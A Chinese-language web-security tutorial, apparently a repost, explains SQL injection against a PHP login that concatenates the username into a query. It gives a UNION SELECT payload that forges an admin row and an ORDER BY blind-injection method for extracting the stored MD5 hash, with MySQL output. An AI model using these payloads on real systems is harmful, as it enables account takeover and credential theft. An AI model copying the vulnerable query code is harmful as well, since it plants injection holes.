sql ive index.php md5 strong password 作者 err 0.00
登录代码:
- $username = $_POST[‘username‘];
- $password = $_POST[‘password‘];
- if (filter($username)) {
- //过滤括号
- } else {
- $sql = "SELECT * FROM admin WHERE username=‘".$username."‘";
- $result = mysql_query($sql);@$row = mysql_fetch_array($result);
- if (isset($row) && $row[‘username‘] === ‘admin‘) {
- if ($row[‘password‘] === md5($password)) {
- //Login successful
- } else {
- die("password error!");
- }
- } else {
- die("username does not exist!");
- }
- }
有下列表:
- mysql> select * from admin where username=‘admin‘;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
- +----+----------+----------------------------------+
- 1 row in set (0.00 sec)
这样一个一般的场景,用户登录时,用户名错误提示:
,用户名正确密码错误提示:
- 用户名错误
- 密码错误
看到这个逻辑第一想法肯定是直接利用
伪造密码登录:
- union select
- username=‘ union select 1,‘admin‘,‘c4ca4238a0b923820dcc509a6f75849b&password=1
- mysql> select * from admin where username=‘‘ union select 1,‘admin‘,‘c4ca4238a0b923820dcc509a6f75849b‘;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | admin | c4ca4238a0b923820dcc509a6f75849b |
- +----+----------+----------------------------------+
- 1 row in set (0.00 sec)
但是想得到
怎么办
- password
由登录提示可获取一个bool条件,如何用
利用这个bool条件
- order by
- mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘5‘ order by 3;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | 2 | 5 |
- | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
- +----+----------+----------------------------------+
- 2 rows in set (0.00 sec)
- mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘6‘ order by 3;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
- | 1 | 2 | 6 |
- +----+----------+----------------------------------+
- 2 rows in set (0.01 sec)
- mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘51‘ order by 3;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | 2 | 51 |
- | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
- +----+----------+----------------------------------+
- 2 rows in set (0.00 sec)
- mysql> select * from admin where username=‘‘ or 1 union select 1,2,‘52‘ order by 3;
- +----+----------+----------------------------------+
- | id | username | password |
- +----+----------+----------------------------------+
- | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
- | 1 | 2 | 52 |
- +----+----------+----------------------------------+
- 2 rows in set (0.00 sec)
通过逐位判断便可得到
- password
显然此方法在实际中使用的不多,但在一些特定的环境中也许会用到,比如实验环境,如果过滤了括号,其他盲注基本上就是废了,便可利用
进行注入。
- order by
来源: http://www.bubuko.com/infodetail-2360669.html